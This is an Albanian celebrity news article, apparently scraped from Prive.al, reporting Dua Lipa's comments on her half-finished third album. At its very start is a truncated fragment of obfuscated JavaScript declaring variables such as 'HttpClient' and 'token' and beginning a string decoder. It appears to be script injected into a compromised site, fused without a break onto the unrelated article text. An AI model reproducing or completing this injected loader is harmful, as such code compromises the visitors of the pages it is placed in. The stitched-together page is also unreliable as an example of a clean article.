;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A jeni gati për albumin e tretë nga Dua? Këto janë detajet që dihen deri më tani

By

Dua Lipa po ndan më shumë detaje rreth albumit të saj të ardhshëm!

Këngëtarja po tregon emocionet e saj tani që albumi po “fillon të marrë formë” dhe është “50 për qind i kryer”.

Ylli 26-vjeçar, që do të performojë këtë verë në festivalin e shumëpritur të muzikës Lollapalooza, foli për albumin e saj të tretë me Elton John në emisionin e tij të podcast-it ” At Your Service”.

Dua thotë se muzika e saj e re “po fillon të tingëllojë  mirë”, duke shpjeguar se “Po fillon të marrë formë. Jam shumë e emocionuar për disa nga këngët e reja, kështu që është gjithmonë emocionuese të punosh për diçka.”

Këngëtarja u pyet më parë në janar në lidhje me albumin e saj të ri, gjatë një interviste me The Wall Street Journal, duke pranuar se ajo “nuk nxitonte” për të publikuar këngë të reja, megjithatë ajo kishte “shumë prej tyre të regjistruara”, duke iu referuar albumit ende pa emër.

Ajo gjithashtu tha se kishte një vizion të qartë, “Mendoj për momentin. Ka qenë thjesht argëtuese duke eksperimentuar. Unë gjithmonë do të bëj muzikë pop, por ajo ka tingullin e vet unik, e cili është emocionuese.” /Prive.al

Artikuj të ngjashëm